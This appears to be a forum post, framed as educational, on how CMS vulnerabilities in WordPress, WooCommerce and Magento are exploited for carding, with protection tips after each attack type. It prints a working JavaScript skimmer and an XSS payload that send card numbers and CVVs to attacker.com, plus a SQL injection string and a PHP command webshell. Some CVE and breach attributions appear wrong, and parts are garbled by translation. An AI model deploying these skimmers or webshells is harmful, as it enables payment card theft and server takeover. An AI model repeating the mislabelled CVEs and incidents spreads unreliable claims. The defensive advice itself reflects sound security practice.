A detailed analysis of the vulnerabilities in CMS used for carding

[Student]

Carding is a form of cybercrime in which attackers use stolen bank card data to test its validity (card testing) or steal user data by deploying skimmers (scripts that intercept entered data). Content management systems (CMS) such as WordPress (especially with e-commerce plugins like WooCommerce), Magento, Joomla, and Drupal are popular targets due to their widespread use and modular structure. WordPress, which accounts for over 40% of the website market, is particularly vulnerable: according to Sucuri, 34.5% of all skimmers in 2021 targeted WordPress, and this share is growing due to the platform's popularity and the number of legacy installations.

For educational purposes, I will detail the most commonly exploited vulnerabilities, their mechanisms, exploitation examples, implications for carding, and protection methods. I'll also add context from current reports (Patchstack, Wordfence, Sucuri) and real-world cases to illustrate how hackers exploit these vulnerabilities. For clarity, I'll organize the information by vulnerability type, include code examples (where applicable), and provide a chart to illustrate the distribution of attack types.

1. Outdated plugins and themes​

Description: Plugins and themes are the primary entry point for attacks on CMSs. According to Patchstack, 54% of all WordPress vulnerabilities are related to plugins, and 90% of successful hacks are due to outdated software. Hackers use publicly known exploits (0-day or previously disclosed CVEs) to gain access.

Exploitation mechanism:

• Outdated plugins contain vulnerabilities such as Remote Code Execution (RCE), Cross-Site Scripting (XSS), or PHP Object Injection.
• Hackers scan websites (for example, using WPScan) for old versions of plugins and use automated exploits.
• Once access is gained, they inject skimmers (for example, JavaScript code into the WooCommerce checkout form) or install backdoors for further attacks.

Examples:

• GiveWP (CVE-2024-8353): A PHP Object Injection vulnerability via the give_ and card_ parameters allowed attackers to inject malicious code that stole card data from donation forms.
• Popup Builder (CVE-2024-25600): An XSS vulnerability allowed injection of skimmers that intercepted data entered into forms.
• Forminator: In 2023, a vulnerability allowed malicious files to be uploaded, resulting in the installation of backdoors for card testing.

Carding connection:

• Skimmers are embedded into payment forms (for example, WooCommerce checkout) and send card data to the attackers' servers.
• Backdoors allow bots to be launched to check the validity of cards (testing small transactions).
• In 2024, Wordfence recorded >100,000 attacks per day through outdated plugins.

Skimmer example (JavaScript):

document.getElementById('payment-form').addEventListener('submit', function(e) {
var cardData = {
number: document.getElementById('card-number').value,
cvv: document.getElementById('cvv').value
};
fetch('https://attacker.com/steal', {
method: 'POST',
body: JSON.stringify(cardData)
});
});

This code intercepts card data and sends it to the hacker's server.

Protection:

• Update WordPress core, plugins, and themes weekly. Use automatic updates.
• Remove unused plugins/themes.
• Install a security plugin (Wordfence, MalCare) to monitor vulnerabilities.
• Use WPScan for regular scanning.

2. Cross-Site Scripting (XSS)​

Description: XSS allows malicious scripts to be injected into website pages, which are executed in the victim's browser. Stored XSS is the most dangerous type of XSS in the context of carding, as the script is stored on the server and executed for all page visitors.

Exploitation mechanism:

• Hackers find forms (search, comments, plugin settings) where input is not validated.
• They embed JavaScript code that runs on the payment page.
• Skimmers collect card data, cookies, or redirect users to phishing pages.

Examples:

• WP Meta SEO (CVE-2024-2194): XSS in the plugin settings allowed skimmers to be injected into e-commerce pages.
• LiteSpeed Cache (CVE-2023-6961): A caching vulnerability allowed script injection into forms.
• MonsterInsights (>3 million installs): XSS was used in 2023 to steal data from analytics and forms.

Carding connection:

• Skimmers (such as Magecart) infiltrate checkout pages and steal card data in real time.
• In 2024, XSS accounted for 30% of attacks on WordPress (according to Wordfence).
• Example: The 2018 British Airways attack via XSS in Magento stole data from 380,000 cards.

Example of exploitation (Stored XSS):

<script>fetch('https://attacker.com/steal?data=' + encodeURIComponent(document.getElementById('card-number').value));</script>

This code can be injected through a vulnerable comment form.

Protection:

• Validate and escape user input (use esc_html(), esc_attr() in WP).
• Enable Content Security Policy (CSP) to restrict script sources.
• Install security plugins with XSS blocking feature (Sucuri, iThemes Security).
• Regularly check the source code of your pages for suspicious scripts.

3. SQL Injection (SQLi)​

Description: SQL injection allows hackers to inject malicious SQL queries through forms or URL parameters to extract data from a database or bypass authentication.

Exploitation mechanism:

• Hackers find vulnerable forms (for example, search or filters in WooCommerce).
• Implement 1=1 or UNION SELECT queries to access tables containing user or order data.
• Extract card data (if stored in the database) or admin accounts.

Examples:

• Contact Form 7 (before version 5.7): A vulnerability in form handling allowed SQLi.
• WooCommerce (old versions): Vulnerabilities in product filters.
• Joomla/Magento: SQLi in catalog or profile modules.

Carding connection:

• Access to the database allows you to extract order data, including partially stored card data (if there is no tokenization).
• Hackers can obtain admin credentials for further injection of skimmers.

SQLi example:

' OR 1=1; --

Embedding in a search form can return all records from the wp_users table.

Protection:

• Use parameterized queries ($wpdb->prepare() in WP).
• Limit DB privileges (only necessary operations).
• Install WAF (Cloudflare, Sucuri) to filter SQLi.
• Make database backups regularly.

4. File Upload Vulnerabilities​

Description: Vulnerabilities that allow malicious files (such as PHP scripts) to be uploaded without checking their type or content.

Exploitation mechanism:

• Hackers upload webshells (e.g. backdoor.php) through vulnerable upload forms.
• Webshell gives you full control over your server, including installing skimmers or running bots.
• Often used in plugins with media loading functionality.

Examples:

• Startklar Elementor Addons (CVE-2024-4345): Ability to upload PHP files via Elementor forms.
• RFI/LFI (Remote/Local File Inclusion): In legacy themes that allow external scripts to be embedded.

Carding connection:

• Webshell is used to install skimmers or automated bots for testing cards.
• Example: In 2023, an attack on the File Manager plugin allowed backdoors to be uploaded to >10,000 websites.

Webshell example:

<?php
if(isset($_POST['cmd'])) {
system($_POST['cmd']);
}
?>

This code allows you to execute commands on the server.

Protection:

• Restrict the types of files uploaded (prohibit .php, .exe).
• Check files on the server (for example, using getimagesize() for images).
• Use plugins to monitor changes in files (Wordfence, iThemes Security).

5. Brute Force on login​

Description: Brute-force attacks on login pages (e.g. wp-login.php) or APIs (XML-RPC).

Exploitation mechanism:

• Bots send thousands of requests with login/password combinations.
• Once access is gained, hackers install skimmers or backdoors.

Examples:

• Attacks on wp-login.php and xmlrpc.php in WordPress.
• In 2015, a brute force attack on Dunkin' Donuts resulted in the theft of gift cards.

Carding connection:

• Access to the admin panel allows you to implement skimmers or change payment gateway settings.
• Bots test maps through admin access, bypassing CAPTCHA.

Protection:

• Limit login attempts (Limit Login Attempts Reloaded plugin).
• Enable two-factor authentication (2FA).
• Change the admin URL (/wp-admin/ → /custom-login/).
• Disable XML-RPC if not used.

6. Cross-Site Request Forgery (CSRF)​

Description: A vulnerability in which hackers can trick an authorized user into performing an unwanted action (such as changing settings).

Exploitation mechanism:

• Hackers send the victim a link or form that performs an action on behalf of the administrator.
• For example, changing the payment gateway to a phishing one.

Examples:

• Vulnerabilities in WordPress core (up to 6.4) and plugins without nonce token verification.
• In Magento: CSRF in the admin panel to change settings.

Carding connection:

• Changing payment settings to intercept transactions.
• Installing phishing pages to collect card data.

Protection:

• Use nonce tokens for all forms (wp_nonce_field()).
• Check the HTTP referrer.
• Train admins not to click on suspicious links.

Statistics and trends​

Key findings:

• XSS (30%) and Brute Force (25%) are the leaders due to their ease of exploitation.
• SQLi (20%) and File Upload (15%) require more skills but provide complete control.
• In 2024, Patchstack recorded a 161% increase in attacks due to automated bots.
• WordPress accounts for 83% of all CMS hacks due to its popularity and outdated plugins.

Real cases​

1. British Airways (2018): A Magecart attack using XSS in Magento stole data from 380,000 cards. The skimmer was embedded in the payment form.
2. Ticketmaster (2018): Skimmer, using a third-party plugin called Inbenta, collected card data over a period of months.
3. WooCommerce (2023): A vulnerability in the Custom Payment Gateways plugin allowed injection of skimmers, resulting in a data leak on >5,000 sites.

Comprehensive protection​

1. Updates:
   • Set up automatic updates for WordPress, plugins, and themes.
   • Remove unused extensions (reduces risk by 50%).
2. Server security:
   • Use WAF (Cloudflare, Sucuri) to block XSS, SQLi and bots.
   • Restrict access to files (chmod 644 for files, 755 for folders).
3. Payment gateways:
   • Use tokenization (Stripe, PayPal) instead of storing card data.
   • Enable 3D Secure and CAPTCHA on checkout pages.
4. Monitoring:
   • Check server logs for anomalies (e.g. traffic spikes to /checkout/).
   • Use VirusTotal to analyze scripts in your website code.
5. Backup:
   • Set up daily backups (UpdraftPlus, Jetpack Backup).
   • Store backups on an external server.
6. Training:
   • Train admins to recognize phishing and suspicious activity.
   • Use complex passwords and 2FA.

Conclusion​

Carding in CMSs, especially WordPress, thrives due to outdated software, weak input validation, and automated attacks. XSS and outdated plugins are the main vectors, as they allow skimmers to be deployed or admin panel access to be gained. Regular updates, WAFs, payment tokenization, and monitoring reduce risks by 80–90%. For educational purposes, it's important to understand that each vulnerability is a link in the attack chain, and protection requires a comprehensive approach. If a site has already been hacked, use plugins like Sucuri for cleaning and analysis.